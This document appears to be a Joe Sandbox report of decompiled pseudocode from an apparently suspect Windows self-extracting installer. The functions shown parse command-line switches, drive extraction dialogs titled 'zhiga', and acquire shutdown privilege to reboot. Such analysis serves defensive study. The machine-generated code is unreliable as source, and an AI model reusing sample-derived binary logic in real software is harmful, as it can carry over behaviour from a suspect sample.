                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                        																				if(_t142 == 0) {
                                                                        																					_t143 = 2;
                                                                        																					 *0xf89a2c =  *0xf89a2c | _t143;
                                                                        																					goto L70;
                                                                        																				} else {
                                                                        																					_t145 = _t142 - 3;
                                                                        																					if(_t145 == 0) {
                                                                        																						 *0xf88d48 =  *0xf88d48 | 0x00000040;
                                                                        																					} else {
                                                                        																						_t146 = _t145 - 5;
                                                                        																						if(_t146 == 0) {
                                                                        																							 *0xf89a2c =  *0xf89a2c & 0xfffffffd;
                                                                        																							goto L70;
                                                                        																						} else {
                                                                        																							_t147 = _t146 - 5;
                                                                        																							if(_t147 == 0) {
                                                                        																								 *0xf89a2c =  *0xf89a2c & 0xfffffffe;
                                                                        																								goto L70;
                                                                        																							} else {
                                                                        																								_t149 = _t147;
                                                                        																								if(_t149 == 0) {
                                                                        																									 *0xf88d48 =  *0xf88d48 | 0x00000080;
                                                                        																								} else {
                                                                        																									if(_t149 == 3) {
                                                                        																										 *0xf89a2c =  *0xf89a2c | 0x00000004;
                                                                        																										L70:
                                                                        																										 *0xf88a28 = 1;
                                                                        																									} else {
                                                                        																										_t209 = 0;
                                                                        																									}
                                                                        																								}
                                                                        																							}
                                                                        																						}
                                                                        																					}
                                                                        																				}
                                                                        																				_t144 =  *_t220;
                                                                        																				_t201 = _t144;
                                                                        																			} while (_t144 != 0);
                                                                        																		}
                                                                        																	}
                                                                        																} else {
                                                                        																	 *0xf89a2c = 3;
                                                                        																	 *0xf88a28 = 1;
                                                                        																}
                                                                        																goto L50;
                                                                        															} else {
                                                                        																if(_t132 == 0) {
                                                                        																	goto L98;
                                                                        																} else {
                                                                        																	L49:
                                                                        																	_t209 = 0;
                                                                        																	L50:
                                                                        																	_t173 = _v272;
                                                                        																	if( *_t173 != 0) {
                                                                        																		goto L2;
                                                                        																	} else {
                                                                        																		break;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										} else {
                                                                        											goto L106;
                                                                        										}
                                                                        									} else {
                                                                        										L34:
                                                                        										_t209 = 0;
                                                                        										break;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L131;
                                                                        					}
                                                                        					if( *0xf88a2c != 0 &&  *0xf88b3e == 0) {
                                                                        						if(GetModuleFileNameA( *0xf89a3c, 0xf88b3e, 0x104) == 0) {
                                                                        							_t209 = 0;
                                                                        						} else {
                                                                        							_t202 = 0x5c;
                                                                        							 *((char*)(E00F866C8(0xf88b3e, _t202) + 1)) = 0;
                                                                        						}
                                                                        					}
                                                                        					_t63 = _t209;
                                                                        				}
                                                                        				L131:
                                                                        			}


































































                                                                        0x00f8607b
                                                                        0x00f86081
                                                                        0x00000000
                                                                        0x00f86087
                                                                        0x00f86087
                                                                        0x00f8608d
                                                                        0x00f8609c
                                                                        0x00000000
                                                                        0x00f860a2
                                                                        0x00f860aa
                                                                        0x00f860b2
                                                                        0x00f860b7
                                                                        0x00f860bd
                                                                        0x00f860bf
                                                                        0x00f860bf
                                                                        0x00f860d6
                                                                        0x00f860e0
                                                                        0x00f860e7
                                                                        0x00f860f5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f860f5
                                                                        0x00f8609c
                                                                        0x00f86081
                                                                        0x00f85e62
                                                                        0x00f85e62
                                                                        0x00f85e65
                                                                        0x00f85fd3
                                                                        0x00f85fe9
                                                                        0x00000000
                                                                        0x00f85fef
                                                                        0x00f85fef
                                                                        0x00f85ff7
                                                                        0x00f85ffd
                                                                        0x00f86003
                                                                        0x00f86006
                                                                        0x00f86011
                                                                        0x00f86014
                                                                        0x00f8603d
                                                                        0x00f86016
                                                                        0x00f86018
                                                                        0x00f86019
                                                                        0x00f8601b
                                                                        0x00f86033
                                                                        0x00f8601d
                                                                        0x00f86020
                                                                        0x00f86029
                                                                        0x00f86022
                                                                        0x00f86022
                                                                        0x00f86022
                                                                        0x00f86020
                                                                        0x00f8601b
                                                                        0x00f86042
                                                                        0x00f86044
                                                                        0x00f86046
                                                                        0x00f8604a
                                                                        0x00f85ff7
                                                                        0x00f85fd5
                                                                        0x00f85fd8
                                                                        0x00f85fd8
                                                                        0x00000000
                                                                        0x00f85e6b
                                                                        0x00f85e6b
                                                                        0x00f85e6e
                                                                        0x00f85f8b
                                                                        0x00f85f99
                                                                        0x00000000
                                                                        0x00f85f9f
                                                                        0x00f85fa7
                                                                        0x00f85faf
                                                                        0x00000000
                                                                        0x00f85fb1
                                                                        0x00f85fb3
                                                                        0x00000000
                                                                        0x00f85fb5
                                                                        0x00f85fb7
                                                                        0x00000000
                                                                        0x00f85fb9
                                                                        0x00000000
                                                                        0x00f85fb9
                                                                        0x00f85fb7
                                                                        0x00f85fb3
                                                                        0x00f85faf
                                                                        0x00f85f8d
                                                                        0x00f85f8d
                                                                        0x00f85f8d
                                                                        0x00f85f8f
                                                                        0x00f85fc1
                                                                        0x00f85fc1
                                                                        0x00f85fc1
                                                                        0x00000000
                                                                        0x00f85e74
                                                                        0x00f85e74
                                                                        0x00f85e77
                                                                        0x00f85ea0
                                                                        0x00f85ebd
                                                                        0x00f85f79
                                                                        0x00000000
                                                                        0x00f85f7f
                                                                        0x00f85ec3
                                                                        0x00f85ec3
                                                                        0x00f85ecc
                                                                        0x00f85ed4
                                                                        0x00f85ed6
                                                                        0x00f85edc
                                                                        0x00f85edf
                                                                        0x00f85eea
                                                                        0x00f85eed
                                                                        0x00f85f3f
                                                                        0x00f85f40
                                                                        0x00000000
                                                                        0x00f85eef
                                                                        0x00f85eef
                                                                        0x00f85ef2
                                                                        0x00f85f34
                                                                        0x00f85ef4
                                                                        0x00f85ef4
                                                                        0x00f85ef7
                                                                        0x00f85f2b
                                                                        0x00000000
                                                                        0x00f85ef9
                                                                        0x00f85ef9
                                                                        0x00f85efc
                                                                        0x00f85f22
                                                                        0x00000000
                                                                        0x00f85efe
                                                                        0x00f85eff
                                                                        0x00f85f02
                                                                        0x00f85f16
                                                                        0x00f85f04
                                                                        0x00f85f07
                                                                        0x00f85f0d
                                                                        0x00f85f46
                                                                        0x00f85f46
                                                                        0x00f85f09
                                                                        0x00f85f09
                                                                        0x00f85f09
                                                                        0x00f85f07
                                                                        0x00f85f02
                                                                        0x00f85efc
                                                                        0x00f85ef7
                                                                        0x00f85ef2
                                                                        0x00f85f4c
                                                                        0x00f85f4e
                                                                        0x00f85f50
                                                                        0x00f85f54
                                                                        0x00f85ed4
                                                                        0x00f85ea2
                                                                        0x00f85ea4
                                                                        0x00f85eaf
                                                                        0x00f85eaf
                                                                        0x00000000
                                                                        0x00f85e79
                                                                        0x00f85e7d
                                                                        0x00000000
                                                                        0x00f85e83
                                                                        0x00f85e83
                                                                        0x00f85e83
                                                                        0x00f85e85
                                                                        0x00f85e85
                                                                        0x00f85e8e
                                                                        0x00000000
                                                                        0x00f85e94
                                                                        0x00000000
                                                                        0x00f85e94
                                                                        0x00f85e8e
                                                                        0x00f85e7d
                                                                        0x00f85e77
                                                                        0x00f85e6e
                                                                        0x00f85e65
                                                                        0x00f85e5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85dd0
                                                                        0x00f85dd0
                                                                        0x00f85dd0
                                                                        0x00000000
                                                                        0x00f85dd0
                                                                        0x00f85dce
                                                                        0x00f85dca
                                                                        0x00f85dba
                                                                        0x00000000
                                                                        0x00f85d00
                                                                        0x00f85dd9
                                                                        0x00f85e04
                                                                        0x00f861fe
                                                                        0x00f85e0a
                                                                        0x00f85e0c
                                                                        0x00f85e17
                                                                        0x00f85e17
                                                                        0x00f85e04
                                                                        0x00f86200
                                                                        0x00f86200
                                                                        0x00000000

                                                                        APIs
                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00F85CEE
                                                                        • GetModuleFileNameA.KERNEL32(00F88B3E,00000104,00000000,?,?), ref: 00F85DFC
                                                                        • CharUpperA.USER32(?), ref: 00F85E3E
                                                                        • CharUpperA.USER32(-00000052), ref: 00F85EE1
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00F85F6F
                                                                        • CharUpperA.USER32(?), ref: 00F85FA7
                                                                        • CharUpperA.USER32(-0000004E), ref: 00F86008
                                                                        • CharUpperA.USER32(?), ref: 00F860AA
                                                                        • CloseHandle.KERNEL32(00000000,00F81140,00000000,00000040,00000000), ref: 00F861F1
                                                                        • ExitProcess.KERNEL32 ref: 00F861F8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                        • String ID: "$"$:$RegServer
                                                                        • API String ID: 1203814774-25366791
                                                                        • Opcode ID: e244199a395362455e24472f07b387b4f8f61a68e40eda09ad8a11c5431458f5
                                                                        • Instruction ID: 4be49d7b08efaafca0050c4b00601d8dd3bff84834d3d27bd47d0278601c40ec
                                                                        • Opcode Fuzzy Hash: e244199a395362455e24472f07b387b4f8f61a68e40eda09ad8a11c5431458f5
                                                                        • Instruction Fuzzy Hash: ABD17D72E08A585FDF35BB388C4C3F53BA1AB16B64F5401EAC486DA191D7748E86BF01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 60%
                                                                        			E00F81F90(signed int __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                        				void* _v28;
                                                                        				void* __ebx;
                                                                        				signed int _t13;
                                                                        				int _t21;
                                                                        				void* _t25;
                                                                        				int _t28;
                                                                        				signed char _t30;
                                                                        				void* _t38;
                                                                        				void* _t40;
                                                                        				void* _t41;
                                                                        				signed int _t46;
                                                                        
                                                                        				_t41 = __esi;
                                                                        				_t38 = __edi;
                                                                        				_t30 = __ecx;
                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                        					L12:
                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                        						L14:
                                                                        						if( *0xf89a40 != 0) {
                                                                        							_pop(_t30);
                                                                        							_t44 = _t46;
                                                                        							_t13 =  *0xf88004; // 0x7e92e7a6
                                                                        							_v8 = _t13 ^ _t46;
                                                                        							_push(_t38);
                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                        								_v24.PrivilegeCount = 1;
                                                                        								_v12 = 2;
                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                        								CloseHandle(_v28);
                                                                        								_t41 = _t41;
                                                                        								_push(0);
                                                                        								if(_t21 != 0) {
                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                        										_t25 = 1;
                                                                        									} else {
                                                                        										_t37 = 0x4f7;
                                                                        										goto L3;
                                                                        									}
                                                                        								} else {
                                                                        									_t37 = 0x4f6;
                                                                        									goto L4;
                                                                        								}
                                                                        							} else {
                                                                        								_t37 = 0x4f5;
                                                                        								L3:
                                                                        								_push(0);
                                                                        								L4:
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								E00F844B9(0, _t37);
                                                                        								_t25 = 0;
                                                                        							}
                                                                        							_pop(_t40);
                                                                        							return E00F86CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                        						} else {
                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                        							goto L16;
                                                                        						}
                                                                        					} else {
                                                                        						_t37 = 0x522;
                                                                        						_t28 = E00F844B9(0, 0x522, 0xf81140, 0, 0x40, 4);
                                                                        						if(_t28 != 6) {
                                                                        							goto L16;
                                                                        						} else {
                                                                        							goto L14;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					__eax = E00F81EA7(__ecx);
                                                                        					if(__eax != 2) {
                                                                        						L16:
                                                                        						return _t28;
                                                                        					} else {
                                                                        						goto L12;
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00F81EFB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00F81F02
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00F81FD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 2795981589-3733053543
                                                                        • Opcode ID: e6159ec9afa2ad91e34393e62bef4f1d0f91b9fbf7731077404ebe208f17e4ab
                                                                        • Instruction ID: 863b8c94d020b1e36eb1bf2d852f6b3e2791c4a04108dd37feb749b97ee84a52
                                                                        • Opcode Fuzzy Hash: e6159ec9afa2ad91e34393e62bef4f1d0f91b9fbf7731077404ebe208f17e4ab
                                                                        • Instruction Fuzzy Hash: 7A218871F402096AEB207BA19C4EFFB76BCFB85B61F100219FB06D6181D7798842B761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F86CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                        
                                                                        				SetUnhandledExceptionFilter(0);
                                                                        				UnhandledExceptionFilter(_a4);
                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                        			}



                                                                        0x00f86cf7
                                                                        0x00f86d00
                                                                        0x00f86d19

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F86E26,00F81000), ref: 00F86CF7
                                                                        • UnhandledExceptionFilter.KERNEL32(00F86E26,?,00F86E26,00F81000), ref: 00F86D00
                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00F86E26,00F81000), ref: 00F86D0B
                                                                        • TerminateProcess.KERNEL32(00000000,?,00F86E26,00F81000), ref: 00F86D12
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                        • String ID:
                                                                        • API String ID: 3231755760-0
                                                                        • Opcode ID: 7cbcf4c16f1644d61c82686fedde776e0d3b72fd0fe9b38cdd1c8ebd92896626
                                                                        • Instruction ID: bb9024d3069dc1ac8d5d4addee58cdd0ef5b690df018dd5a5755c719aaf9839b
                                                                        • Opcode Fuzzy Hash: 7cbcf4c16f1644d61c82686fedde776e0d3b72fd0fe9b38cdd1c8ebd92896626
                                                                        • Instruction Fuzzy Hash: 96D0C93200090CBBFB002BE1EC0CAA93F28EB48616F484002F31982021CA364451AF52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 76%
                                                                        			E00F83210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* __edi;
                                                                        				void* _t6;
                                                                        				void* _t10;
                                                                        				int _t20;
                                                                        				int _t21;
                                                                        				int _t23;
                                                                        				char _t24;
                                                                        				long _t25;
                                                                        				int _t27;
                                                                        				int _t30;
                                                                        				void* _t32;
                                                                        				int _t33;
                                                                        				int _t34;
                                                                        				int _t37;
                                                                        				int _t38;
                                                                        				int _t39;
                                                                        				void* _t42;
                                                                        				void* _t46;
                                                                        				CHAR* _t49;
                                                                        				void* _t58;
                                                                        				void* _t63;
                                                                        				struct HWND__* _t64;
                                                                        
                                                                        				_t64 = _a4;
                                                                        				_t6 = _a8 - 0x10;
                                                                        				if(_t6 == 0) {
                                                                        					_push(0);
                                                                        					L38:
                                                                        					EndDialog(_t64, ??);
                                                                        					L39:
                                                                        					__eflags = 1;
                                                                        					return 1;
                                                                        				}
                                                                        				_t42 = 1;
                                                                        				_t10 = _t6 - 0x100;
                                                                        				if(_t10 == 0) {
                                                                        					E00F843D0(_t64, GetDesktopWindow());
                                                                        					SetWindowTextA(_t64, "zhiga");
                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                        					__eflags =  *0xf89a40 - _t42; // 0x3
                                                                        					if(__eflags == 0) {
                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                        					}
                                                                        					L36:
                                                                        					return _t42;
                                                                        				}
                                                                        				if(_t10 == _t42) {
                                                                        					_t20 = _a12 - 1;
                                                                        					__eflags = _t20;
                                                                        					if(_t20 == 0) {
                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0xf891e4, 0x104);
                                                                        						__eflags = _t21;
                                                                        						if(_t21 == 0) {
                                                                        							L32:
                                                                        							_t58 = 0x4bf;
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							L25:
                                                                        							E00F844B9(_t64, _t58);
                                                                        							goto L39;
                                                                        						}
                                                                        						_t49 = 0xf891e4;
                                                                        						do {
                                                                        							_t23 =  *_t49;
                                                                        							_t49 =  &(_t49[1]);
                                                                        							__eflags = _t23;
                                                                        						} while (_t23 != 0);
                                                                        						__eflags = _t49 - 0xf891e5 - 3;
                                                                        						if(_t49 - 0xf891e5 < 3) {
                                                                        							goto L32;
                                                                        						}
                                                                        						_t24 =  *0xf891e5; // 0x3a
                                                                        						__eflags = _t24 - 0x3a;
                                                                        						if(_t24 == 0x3a) {
                                                                        							L21:
                                                                        							_t25 = GetFileAttributesA(0xf891e4);
                                                                        							__eflags = _t25 - 0xffffffff;
                                                                        							if(_t25 != 0xffffffff) {
                                                                        								L26:
                                                                        								E00F8658A(0xf891e4, 0x104, 0xf81140);
                                                                        								_t27 = E00F858C8(0xf891e4);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 != 0) {
                                                                        									__eflags =  *0xf891e4 - 0x5c;
                                                                        									if( *0xf891e4 != 0x5c) {
                                                                        										L30:
                                                                        										_t30 = E00F8597D(0xf891e4, 1, _t64, 1);
                                                                        										__eflags = _t30;
                                                                        										if(_t30 == 0) {
                                                                        											L35:
                                                                        											_t42 = 1;
                                                                        											__eflags = 1;
                                                                        											goto L36;
                                                                        										}
                                                                        										L31:
                                                                        										_t42 = 1;
                                                                        										EndDialog(_t64, 1);
                                                                        										goto L36;
                                                                        									}
                                                                        									__eflags =  *0xf891e5 - 0x5c;
                                                                        									if( *0xf891e5 == 0x5c) {
                                                                        										goto L31;
                                                                        									}
                                                                        									goto L30;
                                                                        								}
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_t58 = 0x4be;
                                                                        								goto L25;
                                                                        							}
                                                                        							_t32 = E00F844B9(_t64, 0x54a, 0xf891e4, 0, 0x20, 4);
                                                                        							__eflags = _t32 - 6;
                                                                        							if(_t32 != 6) {
                                                                        								goto L35;
                                                                        							}
                                                                        							_t33 = CreateDirectoryA(0xf891e4, 0);
                                                                        							__eflags = _t33;
                                                                        							if(_t33 != 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0xf891e4);
                                                                        							_t58 = 0x4cb;
                                                                        							goto L25;
                                                                        						}
                                                                        						__eflags =  *0xf891e4 - 0x5c;
                                                                        						if( *0xf891e4 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						__eflags = _t24 - 0x5c;
                                                                        						if(_t24 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						goto L21;
                                                                        					}
                                                                        					_t34 = _t20 - 1;
                                                                        					__eflags = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						EndDialog(_t64, 0);
                                                                        						 *0xf89124 = 0x800704c7;
                                                                        						goto L39;
                                                                        					}
                                                                        					__eflags = _t34 != 0x834;
                                                                        					if(_t34 != 0x834) {
                                                                        						goto L36;
                                                                        					}
                                                                        					_t37 = LoadStringA( *0xf89a3c, 0x3e8, 0xf88598, 0x200);
                                                                        					__eflags = _t37;
                                                                        					if(_t37 != 0) {
                                                                        						_t38 = E00F84224(_t64, _t46, _t46);
                                                                        						__eflags = _t38;
                                                                        						if(_t38 == 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0xf887a0);
                                                                        						__eflags = _t39;
                                                                        						if(_t39 != 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t63 = 0x4c0;
                                                                        						L9:
                                                                        						E00F844B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						goto L38;
                                                                        					}
                                                                        					_t63 = 0x4b1;
                                                                        					goto L9;
                                                                        				}
                                                                        				return 0;
                                                                        			}
                                                                        0x00f833cc
                                                                        0x00f833ad
                                                                        0x00f833b4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f833b4
                                                                        0x00f83398
                                                                        0x00f83399
                                                                        0x00f8339b
                                                                        0x00f8339c
                                                                        0x00f8339d
                                                                        0x00000000
                                                                        0x00f8339d
                                                                        0x00f8334c
                                                                        0x00f83351
                                                                        0x00f83354
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8335c
                                                                        0x00f83362
                                                                        0x00f83364
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83366
                                                                        0x00f83367
                                                                        0x00f83369
                                                                        0x00f8336a
                                                                        0x00f8336b
                                                                        0x00000000
                                                                        0x00f8336b
                                                                        0x00f8331c
                                                                        0x00f83323
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83329
                                                                        0x00f8332b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8332b
                                                                        0x00f8324c
                                                                        0x00f8324c
                                                                        0x00f8324f
                                                                        0x00f832c8
                                                                        0x00f832ce
                                                                        0x00000000
                                                                        0x00f832ce
                                                                        0x00f83251
                                                                        0x00f83256
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83271
                                                                        0x00f83277
                                                                        0x00f83279
                                                                        0x00f83298
                                                                        0x00f8329d
                                                                        0x00f8329f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f832b0
                                                                        0x00f832b6
                                                                        0x00f832b8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f832be
                                                                        0x00f83280
                                                                        0x00f83289
                                                                        0x00f8328e
                                                                        0x00000000
                                                                        0x00f8328e
                                                                        0x00f8327b
                                                                        0x00000000
                                                                        0x00f8327b
                                                                        0x00000000

                                                                        APIs
                                                                        • LoadStringA.USER32(000003E8,00F88598,00000200), ref: 00F83271
                                                                        • GetDesktopWindow.USER32 ref: 00F833E2
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00F833F7
                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00F83410
                                                                        • GetDlgItem.USER32(?,00000836), ref: 00F83426
                                                                        • EnableWindow.USER32(00000000), ref: 00F8342D
                                                                        • EndDialog.USER32(?,00000000), ref: 00F8343F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$zhiga
                                                                        • API String ID: 2418873061-2157855530
                                                                        • Opcode ID: 474633e13c8ba78efb9db3d44d00790c13dd9ebf4df271fe02faed632663cca6
                                                                        • Instruction ID: 3f338fb9d91bad84f49565cd2430b08ce4a6c8a746bf08647728c35d10361278
                                                                        • Opcode Fuzzy Hash: 474633e13c8ba78efb9db3d44d00790c13dd9ebf4df271fe02faed632663cca6
                                                                        • Instruction Fuzzy Hash: 295146307452457BFB21BB359C8DFFB3A5DDB86F64F144029F646961E0CAB88A02B361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F82CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t13;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				struct HRSRC__* _t31;
                                                                        				intOrPtr _t33;
                                                                        				void* _t43;
                                                                        				void* _t48;
                                                                        				signed int _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				signed int _t67;
                                                                        
                                                                        				_t13 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t13 ^ _t67;
                                                                        				_t65 = 0;
                                                                        				_t66 = __ecx;
                                                                        				_t48 = __edx;
                                                                        				 *0xf89a3c = __ecx;
                                                                        				memset(0xf89140, 0, 0x8fc);
                                                                        				memset(0xf88a20, 0, 0x32c);
                                                                        				memset(0xf888c0, 0, 0x104);
                                                                        				 *0xf893ec = 1;
                                                                        				_t20 = E00F8468F("TITLE", 0xf89154, 0x7f);
                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                        					_t64 = 0x4b1;
                                                                        					goto L32;
                                                                        				} else {
                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                        					 *0xf8858c = _t27;
                                                                        					SetEvent(_t27);
                                                                        					_t64 = 0xf89a34;
                                                                        					if(E00F8468F("EXTRACTOPT", 0xf89a34, 4) != 0) {
                                                                        						if(( *0xf89a34 & 0x000000c0) == 0) {
                                                                        							L12:
                                                                        							 *0xf89120 =  *0xf89120 & _t65;
                                                                        							if(E00F85C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                        								if( *0xf88a3a == 0) {
                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                        									if(_t31 != 0) {
                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                        									}
                                                                        									if( *0xf88184 != 0) {
                                                                        										__imp__#17();
                                                                        									}
                                                                        									if( *0xf88a24 == 0) {
                                                                        										_t57 = _t65;
                                                                        										if(E00F836EE(_t65) == 0) {
                                                                        											goto L33;
                                                                        										} else {
                                                                        											_t33 =  *0xf89a40; // 0x3
                                                                        											_t48 = 1;
                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                        												if(( *0xf89a34 & 0x00000100) == 0 || ( *0xf88a38 & 0x00000001) != 0 || E00F818A3(_t64, _t66) != 0) {
                                                                        													goto L30;
                                                                        												} else {
                                                                        													_t64 = 0x7d6;
                                                                        													if(E00F86517(_t57, 0x7d6, _t34, E00F819E0, 0x547, 0x83e) != 0x83d) {
                                                                        														goto L33;
                                                                        													} else {
                                                                        														goto L30;
                                                                        													}
                                                                        												}
                                                                        											} else {
                                                                        												L30:
                                                                        												_t23 = _t48;
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										_t23 = 1;
                                                                        									}
                                                                        								} else {
                                                                        									E00F82390(0xf88a3a);
                                                                        									goto L33;
                                                                        								}
                                                                        							} else {
                                                                        								_t64 = 0x520;
                                                                        								L32:
                                                                        								E00F844B9(0, _t64, 0, 0, 0x10, 0);
                                                                        								goto L33;
                                                                        							}
                                                                        						} else {
                                                                        							_t64 =  &_v268;
                                                                        							if(E00F8468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
